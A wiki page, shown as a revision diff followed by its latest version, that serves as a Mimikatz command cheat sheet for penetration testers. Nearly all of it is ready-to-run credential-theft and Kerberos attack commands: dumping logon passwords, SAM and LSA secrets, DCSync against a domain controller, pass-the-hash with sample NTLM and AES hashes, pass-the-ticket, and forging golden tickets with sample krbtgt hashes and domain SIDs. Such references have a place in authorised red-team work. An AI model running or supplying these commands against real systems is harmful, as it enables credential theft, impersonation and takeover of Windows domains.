Mimikatz: Difference between revisions

From RCATs
No edit summary
No edit summary
 
(9 intermediate revisions by one other user not shown)
Line 1: Line 1:
[[Category:Tools]]
[[Category:Tools]]
=Commands=
=Description=
Mimikatz<ref>https://github.com/ParrotSec/mimikatz</ref> is a tool that is primarily used for reading and extracting plaintext passwords, hashes, and other credentials from memory. It is often used by penetration testers and red teamers to gain access to sensitive data and systems. Additionally, it can also be used to perform other tasks such as generating Kerberos tickets, and extracting digital certificates.


==sekurlsa==
==== Links: ====
<syntaxhighlight lang="powershell">
<syntaxhighlight lang="powershell">
Test-AppLockerPolicy
https://gist.github.com/insi2304/484a4e92941b437bad961fcacda82d49
</syntaxhighlight>


=Commands=
==sekurlsa==
<syntaxhighlight lang="powershell">
<syntaxhighlight lang="powershell">
# This command is used to extract logon passwords from the Windows Security Support Provider (SSP)
# Command is used to extract logon passwords from the Windows Security Support Provider (SSP)
sekurlsa::logonpasswords  
sekurlsa::logonpasswords  
This command will extract all logon passwords, including those of network connections.
 
# Command will extract all logon passwords, including those of network connections.
sekurlsa::logonPasswords full
sekurlsa::logonPasswords full
This command will export Kerberos tickets to a file.
 
# Command will export Kerberos tickets to a file.
sekurlsa::tickets /export  
sekurlsa::tickets /export  
# This command is used to perform a pass-the-hash attack on a Windows system. It attempts to authenticate as the specified user with the provided NTLM hash, and runs the specified command.
 
# Command is used to perform a pass-the-hash attack on a Windows system. It attempts to authenticate as the specified user with the provided NTLM hash, and runs the specified command.
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
</syntaxhighlight">
</syntaxhighlight>


==kerberos==
==kerberos==
Line 21: Line 28:
# This command will list and export Kerberos tickets to a file.
# This command will list and export Kerberos tickets to a file.
kerberos::list /export
kerberos::list /export
This command is used to impersonate a user by passing a Kerberos Ticket Granting Ticket (TGT) to the system. The specified file is used as the TGT.
kerberos::ptt c:\chocolate.kirbi -
This command is used to create a Golden Ticket, which is a forged Kerberos TGT that can be used to authenticate as any user in a specified domain. The specified parameters are used to set the properties of the Golden Ticket, such as the administrator account and domain SID
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
</syntaxhighlight">


#general
# This command is used to impersonate a user by passing a Kerberos Ticket Granting Ticket (TGT) to the system. The specified file is used as the TGT.
privilege::debug
kerberos::ptt c:\chocolate.kirbi
log
log customlogfilename.log


# This command is used to create a Golden Ticket, which is a forged Kerberos TGT that can be used to authenticate as any user in a specified domain. The specified parameters are used to set the properties of the Golden Ticket, such as the administrator account and domain SID
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
</syntaxhighlight>


#crypto
==crypto==
<syntaxhighlight lang="powershell">
This command is used to extract cryptographic information from the CryptoAPI (CAPI) of a Windows system.
crypto::capi
crypto::capi
# This command is used to extract cryptographic information from the Cryptography API: Next Generation (CNG) of a Windows system.
crypto::cng
crypto::cng
crypto::certificates /export
 
# This command is used to export certificates from a Windows system.
crypto::certificates /export  
 
# This command is used to export certificates from the local machine certificate store of a Windows system.
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
# This command is used to export cryptographic keys from a Windows system.
crypto::keys /export
crypto::keys /export
# This command is used to export cryptographic keys from the local machine of a Windows system.
crypto::keys /machine /export
crypto::keys /machine /export
</syntaxhighlight>


#vault & lsadump
==vault & lsadump==
<syntaxhighlight lang="powershell">
Extracts credentials from the Windows Vault.
vault::cred
vault::cred
Lists the contents of the Windows Vault.
vault::list
vault::list
Elevates the current user's privileges to that of the Local System account.
token::elevate
token::elevate
vault::cred
 
vault::list
Reverts the current user's privileges to their previous state before elevation.
token::revert
 
Dumps the Security Account Manager (SAM) database, which stores local user account information.
lsadump::sam
lsadump::sam
Dumps the secrets stored in the Local Security Authority (LSA) of a Windows system.
lsadump::secrets
lsadump::secrets
Dumps the LSA secrets cache, which contains recently used authentication information.
lsadump::cache
lsadump::cache
token::revert
 
Perform a DCSync attack, which is used to replicate Active Directory data from a domain controller.
lsadump::dcsync /user:domain\krbtgt /domain:lab.local
lsadump::dcsync /user:domain\krbtgt /domain:lab.local
</syntaxhighlight>


#pth
==PTH==
<syntaxhighlight lang="powershell">
# Attempts to authenticate as the specified user with the provided NTLM hash, and runs the specified command.
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a
# Attempts to authenticate as the specified user with the provided AES-256 hash.
sekurlsa::pth /user:Administrateur /domain:chocolate.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
sekurlsa::pth /user:Administrateur /domain:chocolate.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
# Attempts to authenticate as the specified user with the provided NTLM hash and AES-256 hash.
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
# Attempts to authenticate as the specified user with the provided NTLM hash and runs cmd.exe.
sekurlsa::pth /user:Administrator /domain:WOSHUB /ntlm:{NTLM_hash} /run:cmd.exe
sekurlsa::pth /user:Administrator /domain:WOSHUB /ntlm:{NTLM_hash} /run:cmd.exe
 
</syntaxhighlight>
#ekeys
==ekeys==
<syntaxhighlight lang="powershell">
# Extracts EKEYS (Encrypted Key) keys from the Local Security Authority Subsystem Service (LSASS) process memory.
sekurlsa::ekeys
sekurlsa::ekeys
 
</syntaxhighlight>
#dpapi
==dapi ==
<syntaxhighlight lang="powershell">
# Extracts Data Protection API (DPAPI) credentials from the LSASS process memory.
sekurlsa::dpapi
sekurlsa::dpapi
 
</syntaxhighlight>
#minidump
==minidump==
<syntaxhighlight lang="powershell">
# Extracts information from a memory dump of the LSASS process.
sekurlsa::minidump lsass.dmp
sekurlsa::minidump lsass.dmp
</syntaxhighlight>


#ptt
==PTT==
<syntaxhighlight lang="powershell">
#Impersonate a user by passing a Kerberos Ticket Granting Ticket (TGT) to the system.
kerberos::ptt Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi
kerberos::ptt Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi
 
</syntaxhighlight>
#golden/silver
==Golden & Silver Tickets ==
<syntaxhighlight lang="powershell">
#Create a Golden Ticket, which is a forged Kerberos TGT that can be used to authenticate as any user in a specified domain.
kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi
kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi
kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /aes256:15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 /user:Administrateur /id:500 /groups:513,512,520,518,519 /ptt /startoffset:-10 /endin:600 /renewmax:10080
kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /aes256:15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 /user:Administrateur /id:500 /groups:513,512,520,518,519 /ptt /startoffset:-10 /endin:600 /renewmax:10080
kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi
kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi
 
</syntaxhighlight>
#tgt
==tgt==
<syntaxhighlight lang="powershell">
# Extracts Kerberos TGTs from the LSASS process memory.
kerberos::tgt
kerberos::tgt


#purge
# Removes TGTs from memory.
kerberos::purge
kerberos::purge
</syntaxhighlight>
=References=
<references />

Latest revision as of 04:47, 21 August 2023

Description

Mimikatz[1] is a tool that is primarily used for reading and extracting plaintext passwords, hashes, and other credentials from memory. It is often used by penetration testers and red teamers to gain access to sensitive data and systems. Additionally, it can also be used to perform other tasks such as generating Kerberos tickets, and extracting digital certificates.

Links:

https://gist.github.com/insi2304/484a4e92941b437bad961fcacda82d49

Commands

sekurlsa

# Command is used to extract logon passwords from the Windows Security Support Provider (SSP)
sekurlsa::logonpasswords 

# Command will extract all logon passwords, including those of network connections.
sekurlsa::logonPasswords full

# Command will export Kerberos tickets to a file.
sekurlsa::tickets /export 

# Command is used to perform a pass-the-hash attack on a Windows system. It attempts to authenticate as the specified user with the provided NTLM hash, and runs the specified command.
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

kerberos

# This command will list and export Kerberos tickets to a file.
kerberos::list /export

# This command is used to impersonate a user by passing a Kerberos Ticket Granting Ticket (TGT) to the system. The specified file is used as the TGT.
kerberos::ptt c:\chocolate.kirbi

# This command is used to create a Golden Ticket, which is a forged Kerberos TGT that can be used to authenticate as any user in a specified domain. The specified parameters are used to set the properties of the Golden Ticket, such as the administrator account and domain SID
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

crypto

This command is used to extract cryptographic information from the CryptoAPI (CAPI) of a Windows system.
crypto::capi

# This command is used to extract cryptographic information from the Cryptography API: Next Generation (CNG) of a Windows system.
crypto::cng

# This command is used to export certificates from a Windows system.
crypto::certificates /export 

# This command is used to export certificates from the local machine certificate store of a Windows system.
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

# This command is used to export cryptographic keys from a Windows system.
crypto::keys /export

# This command is used to export cryptographic keys from the local machine of a Windows system.
crypto::keys /machine /export

vault & lsadump

Extracts credentials from the Windows Vault.
vault::cred

Lists the contents of the Windows Vault.
vault::list

Elevates the current user's privileges to that of the Local System account.
token::elevate

Reverts the current user's privileges to their previous state before elevation.
token::revert

Dumps the Security Account Manager (SAM) database, which stores local user account information.
lsadump::sam

Dumps the secrets stored in the Local Security Authority (LSA) of a Windows system.
lsadump::secrets

Dumps the LSA secrets cache, which contains recently used authentication information.
lsadump::cache

Perform a DCSync attack, which is used to replicate Active Directory data from a domain controller.
lsadump::dcsync /user:domain\krbtgt /domain:lab.local

PTH

# Attempts to authenticate as the specified user with the provided NTLM hash, and runs the specified command.
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a

# Attempts to authenticate as the specified user with the provided AES-256 hash.
sekurlsa::pth /user:Administrateur /domain:chocolate.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9

# Attempts to authenticate as the specified user with the provided NTLM hash and AES-256 hash.
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9

# Attempts to authenticate as the specified user with the provided NTLM hash and runs cmd.exe.
sekurlsa::pth /user:Administrator /domain:WOSHUB /ntlm:{NTLM_hash} /run:cmd.exe

ekeys

# Extracts EKEYS (Encrypted Key) keys from the Local Security Authority Subsystem Service (LSASS) process memory.
sekurlsa::ekeys

dapi

# Extracts Data Protection API (DPAPI) credentials from the LSASS process memory.
sekurlsa::dpapi

minidump

# Extracts information from a memory dump of the LSASS process.
sekurlsa::minidump lsass.dmp

PTT

#Impersonate a user by passing a Kerberos Ticket Granting Ticket (TGT) to the system.
kerberos::ptt Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi

Golden & Silver Tickets

#Create a Golden Ticket, which is a forged Kerberos TGT that can be used to authenticate as any user in a specified domain.
kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi
kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /aes256:15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 /user:Administrateur /id:500 /groups:513,512,520,518,519 /ptt /startoffset:-10 /endin:600 /renewmax:10080
kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi

tgt

# Extracts Kerberos TGTs from the LSASS process memory.
kerberos::tgt

# Removes TGTs from memory.
kerberos::purge

References